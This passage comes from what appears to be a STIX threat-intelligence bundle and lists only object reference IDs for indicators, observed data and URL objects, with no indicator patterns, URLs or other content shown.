"indicator--58db7fce-0988-4db1-8baf-42ee02de0b81",
|
|
"indicator--58db7fcf-43f0-4407-901a-42a902de0b81",
|
|
"observed-data--58db7fd0-6924-4e1f-8671-460002de0b81",
|
|
"url--58db7fd0-6924-4e1f-8671-460002de0b81",
|
|
"indicator--58db7fd1-f414-4ef4-9a54-423402de0b81",
|
|
"indicator--58db7fd2-f594-452b-9718-4ab402de0b81",
|
|
"observed-data--58db7fd3-4d94-4938-a2e2-4e7f02de0b81",
|
|
"url--58db7fd3-4d94-4938-a2e2-4e7f02de0b81",
|
|
"indicator--58db7fd4-2ef8-4459-81d4-426502de0b81",
|
|
"indicator--58db7fd5-fdac-483d-82d3-495d02de0b81",
|
|
"observed-data--58db7fd6-5f14-4030-9f46-453302de0b81",
|
|
"url--58db7fd6-5f14-4030-9f46-453302de0b81",
|
|
"indicator--58db7fd7-0138-4bf1-a8ae-412d02de0b81",
|
|
"indicator--58db7fd8-3838-4c83-a078-4c0302de0b81",
|
|
"observed-data--58db7fd9-8f98-437f-9ba7-4fc202de0b81",
|
|
"url--58db7fd9-8f98-437f-9ba7-4fc202de0b81",
|
|
"indicator--58db7fd9-62e8-4eee-8733-44b702de0b81",
|
|
"indicator--58db7fda-16b8-484f-b291-4fe402de0b81",
|
|
"observed-data--58db7fdb-c6fc-41a5-b9fb-411502de0b81",
|
|
"url--58db7fdb-c6fc-41a5-b9fb-411502de0b81",
|
|
"indicator--58db7fdc-a138-4fdf-9263-4a7302de0b81",
|
|
"indicator--58db7fdd-3e0c-404f-b4a8-4add02de0b81",
|
|
"observed-data--58db7fde-3f54-4da3-9519-4af102de0b81",
|
|
"url--58db7fde-3f54-4da3-9519-4af102de0b81",
|
|
"indicator--58db7fdf-bd00-43b9-b8f3-419d02de0b81",
|
|
"indicator--58db7fe0-bcb0-4d98-8de9-4da402de0b81",
|
|
"observed-data--58db7fe0-d6b0-4f2a-8c0f-492e02de0b81",
|
|
"url--58db7fe0-d6b0-4f2a-8c0f-492e02de0b81",
|
|
"indicator--58db7fe1-1fb0-46a4-a5fe-4c2a02de0b81",
|
|
"indicator--58db7fe2-41b4-4c95-be70-4d2702de0b81",
|
|
"observed-data--58db7fe3-99cc-406d-b61f-451c02de0b81",
|
|
"url--58db7fe3-99cc-406d-b61f-451c02de0b81",
|
|
"indicator--58db7fe4-d3b0-4bbc-92b2-4a2c02de0b81",
|
|
"indicator--58db7fe5-84cc-4e3e-b3c8-4c5d02de0b81",
|
|
"observed-data--58db7fe6-c2c0-47e4-b315-4b7e02de0b81",
|
|
"url--58db7fe6-c2c0-47e4-b315-4b7e02de0b81",
|
|
"indicator--58db7fe7-c02c-4b84-93c1-411002de0b81",
|
|
"indicator--58db7fe7-fcd4-4e01-b7f4-4bfe02de0b81",
|
|
"observed-data--58db7fe8-15c8-4e38-ba97-43d502de0b81",
|
|
"url--58db7fe8-15c8-4e38-ba97-43d502de0b81",
|
|
"indicator--58db7fe9-22d8-48fe-9b5c-4c4b02de0b81",
|
|
"indicator--58db7fea-7de4-4b23-ae93-43ec02de0b81",
|
|
"observed-data--58db7feb-a5b0-4ac1-8bcd-4e8a02de0b81",
|
|
"url--58db7feb-a5b0-4ac1-8bcd-4e8a02de0b81",
|
|
"indicator--58db7fec-e51c-4d7f-8c54-4e5202de0b81",
|
|
"indicator--58db7fed-2a2c-4592-8f3e-42c002de0b81",
|
|
"observed-data--58db7fee-ca00-4886-aed1-4ba802de0b81",
|
|
"url--58db7fee-ca00-4886-aed1-4ba802de0b81",
|
|
"indicator--58db7fee-3464-40e5-bc4e-405902de0b81",
|
|
"indicator--58db7fef-6c98-496c-903f-441502de0b81",
|
|
"observed-data--58db7ff0-0228-4e47-847d-456702de0b81",
|
|
"url--58db7ff0-0228-4e47-847d-456702de0b81",
|
|
"indicator--58db7ff1-f7bc-4819-9041-435c02de0b81",
|
|
"indicator--58db7ff2-4240-49c3-ac94-4da402de0b81",
|
|
"observed-data--58db7ff3-92e4-469a-98ee-4e7a02de0b81",
|
|
"url--58db7ff3-92e4-469a-98ee-4e7a02de0b81",
|
|
"indicator--58db7ff4-dd98-4dc0-835e-465602de0b81",
|
|
"indicator--58db7ff5-9b74-4211-b884-4c6b02de0b81",
|
|
"observed-data--58db7ff5-eaac-4d8e-bb3e-4b5b02de0b81",
|
|
"url--58db7ff5-eaac-4d8e-bb3e-4b5b02de0b81",
|
|
"indicator--58db7ff6-111c-4c27-8abb-4fab02de0b81",
|
|
"indicator--58db7ff7-89c4-47ac-b33e-489502de0b81",
|
|
"observed-data--58db7ff8-4824-481e-8eb2-40b502de0b81",
|
|
"url--58db7ff8-4824-481e-8eb2-40b502de0b81",
|
|
"indicator--58db7ff9-15ec-4053-931e-404302de0b81",
|
|
"indicator--58db7ffa-cb6c-464b-84aa-4b2d02de0b81",
|
|
"observed-data--58db7ffb-b354-4acf-a33c-4ef202de0b81",
|
|
"url--58db7ffb-b354-4acf-a33c-4ef202de0b81",
|
|
"indicator--58db7ffc-23b4-4f27-abce-4cc102de0b81",
|
|
"indicator--58db7ffd-81ec-477f-89e6-481202de0b81",
|
|
"observed-data--58db7ffe-ef90-4cf1-ab2a-4b6e02de0b81",
|
|
"url--58db7ffe-ef90-4cf1-ab2a-4b6e02de0b81",
|
|
"indicator--58db7ffe-ebf4-43b2-b3b0-45eb02de0b81",
|
|
"indicator--58db8000-cb88-400d-af2f-4ade02de0b81",
|
|
"observed-data--58db8000-5d94-4ef0-87a4-4c0302de0b81",
|
|
"url--58db8000-5d94-4ef0-87a4-4c0302de0b81",
|
|
"indicator--58db8001-77e8-4b17-9c4e-41ae02de0b81",
|
|
"indicator--58db8002-5868-4ab7-bc0b-44f702de0b81",
|
|
"observed-data--58db8003-a9f4-4a87-a07a-48d102de0b81",
|
|
"url--58db8003-a9f4-4a87-a07a-48d102de0b81",
|
|
"indicator--58db8004-be70-43d9-8d64-496f02de0b81",
|
|
"indicator--58db8005-3864-486e-b638-408e02de0b81",
|
|
"observed-data--58db8006-49dc-4089-9b6f-486302de0b81",
|
|
"url--58db8006-49dc-4089-9b6f-486302de0b81",
|
|
"indicator--58db8007-c364-4ffc-9095-4f6d02de0b81",
|
|
"indicator--58db8009-c484-476f-b389-4a0502de0b81",
|
|
"observed-data--58db800a-b0bc-423a-b83f-490d02de0b81",
|
|
"url--58db800a-b0bc-423a-b83f-490d02de0b81",
|
|
"indicator--58db800b-7ae8-4fca-8848-477a02de0b81",
|
|
"indicator--58db800c-0114-47cd-b048-43ee02de0b81",
|
|
"observed-data--58db800d-c8a8-4a92-bfc9-408a02de0b81",
|
|
"url--58db800d-c8a8-4a92-bfc9-408a02de0b81",
|
|
"indicator--58db800e-d1c0-4dd9-83ce-480202de0b81",
|
|
"indicator--58db800e-36d0-462e-b766-4aa002de0b81",
|
|
"observed-data--58db800f-19d4-4acb-93c6-474b02de0b81",
|
|
"url--58db800f-19d4-4acb-93c6-474b02de0b81",
|
|
"indicator--58db8010-d8cc-4b6a-99c5-4e4902de0b81",
|
|
"indicator--58db8011-a8f4-4afc-8a20-460102de0b81",
|
|
"observed-data--58db8012-b25c-42d1-9f08-456702de0b81",
|
|
"url--58db8012-b25c-42d1-9f08-456702de0b81",
|
|
"indicator--58db8013-9c80-4621-bfc3-48f102de0b81",
|
|
"indicator--58db8014-be98-49e4-9b3a-4da102de0b81",
|
|
"observed-data--58db8015-54c8-484f-8e44-4e3c02de0b81",
|
|
"url--58db8015-54c8-484f-8e44-4e3c02de0b81",
|
|
"indicator--58db8015-33b4-48df-8a12-424b02de0b81",
|
|
"indicator--58db8016-48d8-4095-9601-404002de0b81",
|
|
"observed-data--58db8017-6fd4-4c54-9eae-481402de0b81",
|
|
"url--58db8017-6fd4-4c54-9eae-481402de0b81",
|
|
"indicator--58db8018-4e10-4af4-8eb1-41a802de0b81",
|
|
"indicator--58db8019-ab5c-4715-ae1a-406b02de0b81",
|
|
"observed-data--58db801a-293c-4427-8a65-422602de0b81",
|
|
"url--58db801a-293c-4427-8a65-422602de0b81",
|
|
"indicator--58db801b-3a64-48cf-9087-43af02de0b81",
|
|
"indicator--58db801c-6148-473d-b93a-4e5e02de0b81",
|
|
"observed-data--58db801c-7680-4d40-be0d-461f02de0b81",
|
|
"url--58db801c-7680-4d40-be0d-461f02de0b81",
|
|
"indicator--58db801d-0668-4e33-a8f8-491502de0b81",
|
|
"indicator--58db801e-9d60-4f92-abdb-4fb602de0b81",
|
|
"observed-data--58db801f-9d3c-48b5-8418-4cfc02de0b81",
|
|
"url--58db801f-9d3c-48b5-8418-4cfc02de0b81",
|
|
"indicator--58db8020-4dd0-44c6-9e5b-468102de0b81",
|
|
"indicator--58db8021-9f10-458b-b4f6-4f6002de0b81",
|
|
"observed-data--58db8022-3b9c-4aad-8a49-48b002de0b81",
|
|
"url--58db8022-3b9c-4aad-8a49-48b002de0b81",
|
|
"indicator--58db8023-7fb8-4b4b-b016-4bd202de0b81",
|
|
"indicator--58db8023-d16c-478b-b082-4bb802de0b81",
|
|
"observed-data--58db8024-77a4-4297-953e-499f02de0b81",
|
|
"url--58db8024-77a4-4297-953e-499f02de0b81",
|
|
"indicator--58db8025-ae7c-40c7-9577-453102de0b81",
|
|
"indicator--58db8026-e410-4d56-abce-4f9d02de0b81",
|
|
"observed-data--58db8027-91e4-4f4d-91ee-43a102de0b81",
|
|
"url--58db8027-91e4-4f4d-91ee-43a102de0b81",
|
|
"indicator--58db8028-0f28-451d-bf0b-486902de0b81",
|
|
"indicator--58db8029-e088-4dce-82ba-4ae002de0b81",
|
|
"observed-data--58db802a-da18-4354-b40f-46af02de0b81",
|
|
"url--58db802a-da18-4354-b40f-46af02de0b81",
|
|
"indicator--58db802b-a018-4927-9250-442f02de0b81",
|
|
"indicator--58db802c-04d4-48ec-a238-4c0d02de0b81",
|
|
"observed-data--58db802d-ddf8-4acf-b71e-4f8002de0b81",
|
|
"url--58db802d-ddf8-4acf-b71e-4f8002de0b81",
|
|
"indicator--58db802e-a1ac-4904-9d81-48a302de0b81",
|
|
"indicator--58db802f-f2c4-433a-b2bb-4cda02de0b81",
|
|
"observed-data--58db8030-7a04-42bc-9bed-414802de0b81",
|
|
"url--58db8030-7a04-42bc-9bed-414802de0b81",
|
|
"indicator--58db8031-a760-4ca4-880e-4b8302de0b81",
|
|
"indicator--58db8032-dfb4-4170-a4b5-421e02de0b81",
|
|
"observed-data--58db8033-d088-48cf-964f-457502de0b81",
|
|
"url--58db8033-d088-48cf-964f-457502de0b81",
|
|
"indicator--58db8034-d5e8-4b71-b1e0-438102de0b81",
|
|
"indicator--58db8034-bccc-4bf2-8ba9-4ccf02de0b81",
|
|
"observed-data--58db8035-edfc-4730-b291-46e702de0b81",
|
|
"url--58db8035-edfc-4730-b291-46e702de0b81",
|
|
"indicator--58db8036-9854-4252-9295-4dd702de0b81",
|
|
"indicator--58db8037-68c4-4e49-8e72-477802de0b81",
|
|
"observed-data--58db8038-a5b4-4728-9545-4f5102de0b81",
|
|
"url--58db8038-a5b4-4728-9545-4f5102de0b81",
|
|
"indicator--58db8039-0c50-4461-a66c-405602de0b81",
|
|
"indicator--58db803a-20a4-4061-9a51-409b02de0b81",
|
|
"observed-data--58db803b-7b30-4552-a99a-451402de0b81",
|
|
"url--58db803b-7b30-4552-a99a-451402de0b81",
|
|
"indicator--58db803c-67fc-4a64-9897-415b02de0b81",
|
|
"indicator--58db803d-9178-4a94-99d8-4c5202de0b81",
|
|
"observed-data--58db803e-1bb8-40dd-8779-41a102de0b81",
|
|
"url--58db803e-1bb8-40dd-8779-41a102de0b81",
|
|
"indicator--58db803f-532c-4b5a-91e3-4bad02de0b81",
|
|
"indicator--58db8040-35a8-4caf-a4e6-4fed02de0b81",
|
|
"observed-data--58db8041-cfac-4b45-9947-487e02de0b81",
|
|
"url--58db8041-cfac-4b45-9947-487e02de0b81",
|
|
"indicator--58db8042-52d0-4e42-bc23-4cbf02de0b81",
|
|
"indicator--58db8043-225c-4367-9a90-408402de0b81",
|
|
"observed-data--58db8044-47c0-42a2-b52e-4d1d02de0b81",
|
|
"url--58db8044-47c0-42a2-b52e-4d1d02de0b81",
|
|
"indicator--58db8045-00e8-4966-b0ff-4c5702de0b81",
|
|
"indicator--58db8046-d1ac-49d8-8b23-40fc02de0b81",
|
|
"observed-data--58db8047-c67c-4e58-b1ff-4e7902de0b81",
|
|
"url--58db8047-c67c-4e58-b1ff-4e7902de0b81",
|
|
"indicator--58db8048-4798-4182-bf01-4a9002de0b81",
|
|
"indicator--58db8049-600c-45d2-99dd-4d9c02de0b81",
|
|
"observed-data--58db804a-7c40-49de-b982-4d0102de0b81",
|
|
"url--58db804a-7c40-49de-b982-4d0102de0b81",
|
|
"indicator--58db804b-4ae4-49f5-9184-436f02de0b81",
|
|
"indicator--58db804c-6204-4766-a767-4d0102de0b81",
|
|
"observed-data--58db804d-e36c-4b16-b85b-4bce02de0b81",
|
|
"url--58db804d-e36c-4b16-b85b-4bce02de0b81",
|
|
"indicator--58db804e-055c-46c1-b59e-48ac02de0b81",
|
|
"indicator--58db804f-f8f4-4b1d-af50-4ed702de0b81",
|
|
"observed-data--58db8050-1f74-43d4-b43f-4a6e02de0b81",
|
|
"url--58db8050-1f74-43d4-b43f-4a6e02de0b81",
|
|
"indicator--58db8051-d618-4356-8ace-459002de0b81",
|
|
"indicator--58db8052-8f90-436a-a77e-487302de0b81",
|
|
"observed-data--58db8053-af90-4cbf-baaf-4c8902de0b81",
|
|
"url--58db8053-af90-4cbf-baaf-4c8902de0b81",
|
|
"indicator--58db8054-42a8-4796-9acb-477e02de0b81",
|
|
"indicator--58db8055-8fa4-4d4b-aa43-4d7e02de0b81",
|
|
"observed-data--58db8056-8934-402b-be39-49d502de0b81",
|
|
"url--58db8056-8934-402b-be39-49d502de0b81",
|
|
"indicator--58db8057-4960-4017-ba90-4c4502de0b81",
|
|
"indicator--58db8058-4cac-480f-9b9f-4a5902de0b81",
|
|
"observed-data--58db8059-1db8-438c-81db-473c02de0b81",
|
|
"url--58db8059-1db8-438c-81db-473c02de0b81",
|
|
"indicator--58db805a-2688-407b-a882-4eca02de0b81",
|
|
"indicator--58db805b-7640-41e4-9b97-485b02de0b81",
|
|
"observed-data--58db805c-e590-4161-8cfd-492d02de0b81",
|
|
"url--58db805c-e590-4161-8cfd-492d02de0b81",
|
|
"indicator--58db805d-4a54-4444-903f-4dbd02de0b81",
|
|
"indicator--58db805e-8acc-49b8-ac2c-442e02de0b81",
|
|
"observed-data--58db805f-6034-47e0-8da4-400a02de0b81",
|
|
"url--58db805f-6034-47e0-8da4-400a02de0b81",
|
|
"indicator--58db8060-2954-4336-b695-4f0d02de0b81",
|
|
"indicator--58db8061-431c-4a21-a2a5-467602de0b81",
|
|
"observed-data--58db8062-5714-42ce-af46-4b1e02de0b81",
|
|
"url--58db8062-5714-42ce-af46-4b1e02de0b81",
|
|
"indicator--58db8063-8cdc-4721-977c-44d202de0b81",
|
|
"indicator--58db8064-8424-4925-b3ee-458902de0b81",
|
|
"observed-data--58db8065-5e3c-4a1b-9435-41d402de0b81",
|
|
"url--58db8065-5e3c-4a1b-9435-41d402de0b81",
|
|
"indicator--58db8066-55bc-48eb-82d1-47d102de0b81",
|
|
"indicator--58db8066-7020-4104-a9a5-4dde02de0b81",
|
|
"observed-data--58db8067-fbf4-4c8a-92e8-4c7802de0b81",
|
|
"url--58db8067-fbf4-4c8a-92e8-4c7802de0b81",
|
|
"indicator--58db8068-b2f4-4a36-a104-41e402de0b81",
|
|
"indicator--58db8069-f958-475a-b426-4d1b02de0b81",
|
|
"observed-data--58db806a-6aa0-48fb-b2b7-451302de0b81",
|
|
"url--58db806a-6aa0-48fb-b2b7-451302de0b81",
|
|
"indicator--58db806b-847c-4599-bfa4-4a6d02de0b81",
|
|
"indicator--58db806c-8ca0-4f28-bc7f-4af302de0b81",
|
|
"observed-data--58db806d-1fb4-4e45-a481-413802de0b81",
|
|
"url--58db806d-1fb4-4e45-a481-413802de0b81",
|
|
"indicator--58db806e-de7c-4b23-a9b4-4bbb02de0b81",
|
|
"indicator--58db806f-e460-4277-b22d-4cc602de0b81",
|
|
"observed-data--58db8070-9074-4807-8529-4b5602de0b81",
|
|
"url--58db8070-9074-4807-8529-4b5602de0b81",
|
|
"indicator--58db8071-073c-4456-95c7-49a402de0b81",
|
|
"indicator--58db8072-5b90-4b91-8ad4-455f02de0b81",
|
|
"observed-data--58db8073-d3ec-4635-a9ae-408202de0b81",
|
|
"url--58db8073-d3ec-4635-a9ae-408202de0b81",
|
|
"indicator--58db8073-522c-4de3-a378-483602de0b81",
|
|
"indicator--58db8074-7888-4d7c-8c67-4b8602de0b81",
|
|
"observed-data--58db8075-3410-43f8-bc45-4d9502de0b81",
|
|
"url--58db8075-3410-43f8-bc45-4d9502de0b81",
|
|
"indicator--58db8076-1c10-4f4d-b2f4-48d102de0b81",
|
|
"indicator--58db8077-0370-40dd-a4ec-41ec02de0b81",
|
|
"observed-data--58db8078-7118-4370-b60a-491e02de0b81",
|
|
"url--58db8078-7118-4370-b60a-491e02de0b81",
|
|
"indicator--58db8079-6234-4abd-a677-402302de0b81",
|
|
"indicator--58db807a-81b8-4d1d-82ba-461a02de0b81",
|
|
"observed-data--58db807c-a86c-47a5-b22d-4ddc02de0b81",
|
|
"url--58db807c-a86c-47a5-b22d-4ddc02de0b81",
|
|
"indicator--58db807d-2884-4726-a485-47ab02de0b81",
|
|
"indicator--58db807e-fefc-4a7c-bd02-49f302de0b81",
|
|
"observed-data--58db807f-ae00-4a82-80c7-469c02de0b81",
|
|
"url--58db807f-ae00-4a82-80c7-469c02de0b81",
|
|
"indicator--58db8080-becc-4486-9733-4f4802de0b81",
|
|
"indicator--58db8081-03c0-4e51-a731-492c02de0b81",
|
|
"observed-data--58db8082-bee0-4015-8815-4ecc02de0b81",
|
|
"url--58db8082-bee0-4015-8815-4ecc02de0b81",
|
|
"indicator--58db8083-82bc-468d-a58d-485d02de0b81",
|
|
"indicator--58db8084-c7b4-4f9f-be4a-4dcc02de0b81",
|
|
"observed-data--58db8085-4f7c-4ab1-8ecb-4f2c02de0b81",
|
|
"url--58db8085-4f7c-4ab1-8ecb-4f2c02de0b81",
|
|
"indicator--58db8086-aef8-478b-98d6-48d802de0b81",
|
|
"indicator--58db8087-ae90-47af-89bd-476d02de0b81",
|
|
"observed-data--58db8088-1ee8-4049-bd9c-412f02de0b81",
|
|
"url--58db8088-1ee8-4049-bd9c-412f02de0b81",
|
|
"indicator--58db8089-4ec0-4a25-a24c-46c102de0b81",
|
|
"indicator--58db808a-75b8-4310-82fa-4f5f02de0b81",
|
|
"observed-data--58db808b-1b78-46d8-b1fe-426402de0b81",
|
|
"url--58db808b-1b78-46d8-b1fe-426402de0b81",
|
|
"indicator--58db808c-e9f4-4e7d-a647-4b8602de0b81",
|
|
"indicator--58db808d-eb08-4f46-841a-419702de0b81",
|
|
"observed-data--58db808e-5b08-4fce-9ddd-474a02de0b81",
|
|
"url--58db808e-5b08-4fce-9ddd-474a02de0b81",
|
|
"indicator--58db808f-8344-454b-93a1-488502de0b81",
|
|
"indicator--58db8090-8884-4c05-b0df-40e802de0b81",
|
|
"observed-data--58db8091-52b4-49fe-a01e-4fce02de0b81",
|
|
"url--58db8091-52b4-49fe-a01e-4fce02de0b81",
|
|
"indicator--58db8091-5310-4ed5-9b30-4fd302de0b81",
|
|
"indicator--58db8092-cc58-4058-b82b-4f3702de0b81",
|
|
"observed-data--58db8093-7648-4ee1-b1b4-4f7502de0b81",
|
|
"url--58db8093-7648-4ee1-b1b4-4f7502de0b81",
|
|
"indicator--58db8094-b640-499d-94dd-47d302de0b81",
|
|
"indicator--58db8095-0e24-49ae-962e-457e02de0b81",
|
|
"observed-data--58db8096-02a0-4b63-b3d7-468902de0b81",
|
|
"url--58db8096-02a0-4b63-b3d7-468902de0b81",
|
|
"indicator--58db8097-37e0-42e7-a98e-4ad502de0b81",
|
|
"indicator--58db8098-fee4-4ec3-bfde-4cc502de0b81",
|
|
"observed-data--58db8099-0aa4-4dab-9c41-486f02de0b81",
|
|
"url--58db8099-0aa4-4dab-9c41-486f02de0b81",
|
|
"indicator--58db809a-552c-4730-bb2e-49fc02de0b81",
|
|
"indicator--58db809b-dde8-4873-abf7-4ed902de0b81",
|
|
"observed-data--58db809c-6108-405e-b44e-437d02de0b81",
|
|
"url--58db809c-6108-405e-b44e-437d02de0b81",
|
|
"indicator--58db809d-85c0-482b-a8f0-47a702de0b81",
|
|
"indicator--58db809e-03bc-4212-8e39-4f4702de0b81",
|
|
"observed-data--58db809f-4c70-484d-ad5b-403a02de0b81",
|
|
"url--58db809f-4c70-484d-ad5b-403a02de0b81",
|
|
"indicator--58db80a0-d388-4f56-8b1a-4fbd02de0b81",
|
|
"indicator--58db80a1-1f88-4416-a9a8-437102de0b81",
|
|
"observed-data--58db80a2-b550-4f47-9a39-4df902de0b81",
|
|
"url--58db80a2-b550-4f47-9a39-4df902de0b81",
|
|
"indicator--58db80a4-e45c-4cc7-894a-4ee902de0b81",
|
|
"indicator--58db80a5-26d4-4568-89c1-420c02de0b81",
|
|
"observed-data--58db80a6-40e0-4f30-a185-4fdb02de0b81",
|
|
"url--58db80a6-40e0-4f30-a185-4fdb02de0b81",
|
|
"indicator--58db80a8-9450-435b-a723-438702de0b81",
|
|
"indicator--58db80a9-31b8-4f39-b6c1-4ac602de0b81",
|
|
"observed-data--58db80aa-bf58-4ca1-9815-41e102de0b81",
|
|
"url--58db80aa-bf58-4ca1-9815-41e102de0b81",
|
|
"indicator--58db80aa-16e4-47f7-8459-40ff02de0b81",
|
|
"indicator--58db80ab-8ab0-416c-aa8b-4c1502de0b81",
|
|
"observed-data--58db80ad-5bb4-4621-b1f1-4c0302de0b81",
|
|
"url--58db80ad-5bb4-4621-b1f1-4c0302de0b81",
|
|
"indicator--58db80ae-b0a4-4875-ba48-454802de0b81",
|
|
"indicator--58db80af-3fac-4b9e-b4c4-498a02de0b81",
|
|
"observed-data--58db80b0-7028-434e-b0b6-431c02de0b81",
|
|
"url--58db80b0-7028-434e-b0b6-431c02de0b81",
|
|
"indicator--58db80b1-c4fc-4133-bbd3-42bc02de0b81",
|
|
"indicator--58db80b2-03cc-46dd-ab47-4ab702de0b81",
|
|
"observed-data--58db80b3-3b80-4c74-8b9f-489102de0b81",
|
|
"url--58db80b3-3b80-4c74-8b9f-489102de0b81",
|
|
"indicator--58db80b3-27dc-4077-a41c-4b6502de0b81",
|
|
"indicator--58db80b4-27c8-418a-be33-406602de0b81",
|
|
"observed-data--58db80b5-1218-4e0b-b229-483702de0b81",
|
|
"url--58db80b5-1218-4e0b-b229-483702de0b81",
|
|
"indicator--58db80b6-f030-4331-9f6e-46ab02de0b81",
|
|
"indicator--58db80b7-c840-4c91-92ed-46ed02de0b81",
|
|
"observed-data--58db80b8-0140-4a75-8ee1-4db202de0b81",
|
|
"url--58db80b8-0140-4a75-8ee1-4db202de0b81",
|
|
"indicator--58db80b9-5b88-4713-b2c1-489d02de0b81",
|
|
"indicator--58db80ba-37e4-421c-af6f-46aa02de0b81",
|
|
"observed-data--58db80bb-d670-4bee-9c33-465302de0b81",
|
|
"url--58db80bb-d670-4bee-9c33-465302de0b81",
|
|
"indicator--58db80bc-33b4-4489-b5c0-45d802de0b81",
|
|
"indicator--58db80bc-73f4-4944-ad5a-408302de0b81",
|
|
"observed-data--58db80bd-6b84-44cb-9481-40bf02de0b81",
|
|
"url--58db80bd-6b84-44cb-9481-40bf02de0b81",
|
|
"indicator--58db80be-06f8-4c76-8fe9-454902de0b81",
|
|
"indicator--58db80bf-6c88-4b65-baba-412b02de0b81",
|
|
"observed-data--58db80c0-129c-49c9-af8a-44aa02de0b81",
|
|
"url--58db80c0-129c-49c9-af8a-44aa02de0b81",
|
|
"indicator--58db80c1-8af8-41c2-8f75-47d502de0b81",
|
|
"indicator--58db80c2-4428-4d95-9ef2-4cab02de0b81",
|
|
"observed-data--58db80c3-58f0-48db-af0c-4b5002de0b81",
|
|
"url--58db80c3-58f0-48db-af0c-4b5002de0b81",
|
|
"indicator--58db80c4-a078-4cfd-b22b-426902de0b81",
|
|
"indicator--58db80c5-b8a4-4331-9d90-4a6102de0b81",
|
|
"observed-data--58db80c6-631c-4786-a417-40b502de0b81",
|
|
"url--58db80c6-631c-4786-a417-40b502de0b81",
|
|
"indicator--58db80c7-f1ac-4ece-86fd-4acf02de0b81",
|
|
"indicator--58db80c8-2fa0-495a-8536-45aa02de0b81",
|
|
"observed-data--58db80c9-4f14-4fe9-954a-428302de0b81",
|
|
"url--58db80c9-4f14-4fe9-954a-428302de0b81",
|
|
"indicator--58db80ca-cd80-4a36-aef1-421402de0b81",
|
|
"indicator--58db80ca-160c-4820-931b-457d02de0b81",
|
|
"observed-data--58db80cb-70dc-4e20-ac7c-4d5c02de0b81",
|
|
"url--58db80cb-70dc-4e20-ac7c-4d5c02de0b81",
|
|
"indicator--58db80cc-4de8-4e36-925b-4a3602de0b81",
|
|
"indicator--58db80cd-3238-4a10-9dec-486502de0b81",
|
|
"observed-data--58db80ce-b354-4e0e-b7cf-43d102de0b81",
|
|
"url--58db80ce-b354-4e0e-b7cf-43d102de0b81",
|
|
"indicator--58db80cf-f640-4c3f-a546-400202de0b81",
|
|
"indicator--58db80d0-a8cc-4ab8-befb-406202de0b81",
|
|
"observed-data--58db80d1-e0ac-4574-abf7-427502de0b81",
|
|
"url--58db80d1-e0ac-4574-abf7-427502de0b81",
|
|
"indicator--58db80d2-7b10-495b-ac4b-478902de0b81",
|
|
"indicator--58db80d3-a7d0-4f54-bd5d-47df02de0b81",
|
|
"observed-data--58db80d4-0468-4683-aa6b-4d4e02de0b81",
|
|
"url--58db80d4-0468-4683-aa6b-4d4e02de0b81",
|
|
"indicator--58db80d5-9198-413d-a6d0-43ab02de0b81",
|
|
"indicator--58db80d6-46e8-4ed5-ac00-46c302de0b81",
|
|
"observed-data--58db80d7-e048-4348-b2d9-41c702de0b81",
|
|
"url--58db80d7-e048-4348-b2d9-41c702de0b81",
|
|
"indicator--58db80d8-7520-4f14-99cb-40d302de0b81",
|
|
"indicator--58db80d9-3a80-4748-8b77-46ac02de0b81",
|
|
"observed-data--58db80da-5000-4ca8-8f02-41df02de0b81",
|
|
"url--58db80da-5000-4ca8-8f02-41df02de0b81",
|
|
"indicator--58db80db-8fdc-4930-aba9-42cc02de0b81",
|
|
"indicator--58db80dc-166c-4d73-bbd7-4e9902de0b81",
|
|
"observed-data--58db80dd-9060-4ac9-b77c-4ba602de0b81",
|
|
"url--58db80dd-9060-4ac9-b77c-4ba602de0b81",
|
|
"indicator--58db80de-b444-4b75-9e76-429102de0b81",
|
|
"indicator--58db80df-e2f8-40fe-84ea-4ef302de0b81",
|
|
"observed-data--58db80e0-a668-4a24-9008-403e02de0b81",
|
|
"url--58db80e0-a668-4a24-9008-403e02de0b81",
|
|
"indicator--58db80e1-8b94-48de-a614-446e02de0b81",
|
|
"indicator--58db80e2-9090-481d-8928-49de02de0b81",
|
|
"observed-data--58db80e2-77b8-4bb5-9735-426b02de0b81",
|
|
"url--58db80e2-77b8-4bb5-9735-426b02de0b81",
|
|
"indicator--58db80e3-2c84-49ce-9af8-4a0802de0b81",
|
|
"indicator--58db80e4-6d60-46f8-b358-408b02de0b81",
|
|
"observed-data--58db80e5-c404-4f70-a8b7-441d02de0b81",
|
|
"url--58db80e5-c404-4f70-a8b7-441d02de0b81",
|
|
"indicator--58db80e6-e4d4-4ea2-9f44-4c8002de0b81",
|
|
"indicator--58db80e7-b7e8-4dfc-b92e-47c702de0b81",
|
|
"observed-data--58db80e8-7548-4a58-b2e8-4ff902de0b81",
|
|
"url--58db80e8-7548-4a58-b2e8-4ff902de0b81",
|
|
"indicator--58db80e9-668c-428e-9ddd-467a02de0b81",
|
|
"indicator--58db80ea-be44-4dc8-a1ea-4fdc02de0b81",
|
|
"observed-data--58db80eb-795c-49cd-9c07-4ad602de0b81",
|
|
"url--58db80eb-795c-49cd-9c07-4ad602de0b81",
|
|
"indicator--58db80ec-9280-4732-90e8-497a02de0b81",
|
|
"indicator--58db80ed-d878-4496-9da4-4ea302de0b81",
|
|
"observed-data--58db80ee-89b0-48d1-bc97-4a0b02de0b81",
|
|
"url--58db80ee-89b0-48d1-bc97-4a0b02de0b81",
|
|
"indicator--58db80ef-095c-4a8d-b5d7-41e202de0b81",
|
|
"indicator--58db80f0-38bc-430d-8fe1-4aa502de0b81",
|
|
"observed-data--58db80f0-fdbc-4b07-92d6-42ba02de0b81",
|
|
"url--58db80f0-fdbc-4b07-92d6-42ba02de0b81",
|
|
"indicator--58db80f1-089c-49dd-8cb9-492702de0b81",
|
|
"indicator--58db80f2-ee38-4dcc-a52e-473902de0b81",
|
|
"observed-data--58db80f3-8f08-4042-8b81-4cfd02de0b81",
|
|
"url--58db80f3-8f08-4042-8b81-4cfd02de0b81",
|
|
"indicator--58db80f4-08d4-4bcf-8f1b-41a002de0b81",
|
|
"indicator--58db80f5-5cd8-4af8-903b-46e302de0b81",
|
|
"observed-data--58db80f6-8260-4756-acf6-4aed02de0b81",
|
|
"url--58db80f6-8260-4756-acf6-4aed02de0b81",
|
|
"indicator--58db80f7-4f4c-4d0e-9f5b-4b9b02de0b81",
|
|
"indicator--58db80f8-aee0-4433-9f3c-4dff02de0b81",
|
|
"observed-data--58db80f9-27dc-4cdb-b239-4d9002de0b81",
|
|
"url--58db80f9-27dc-4cdb-b239-4d9002de0b81",
|
|
"indicator--58db80fa-5104-45d7-802f-410502de0b81",
|
|
"indicator--58db80fb-731c-4ab8-9ff4-45fd02de0b81",
|
|
"observed-data--58db80fc-d06c-46dd-a10b-4a9e02de0b81",
|
|
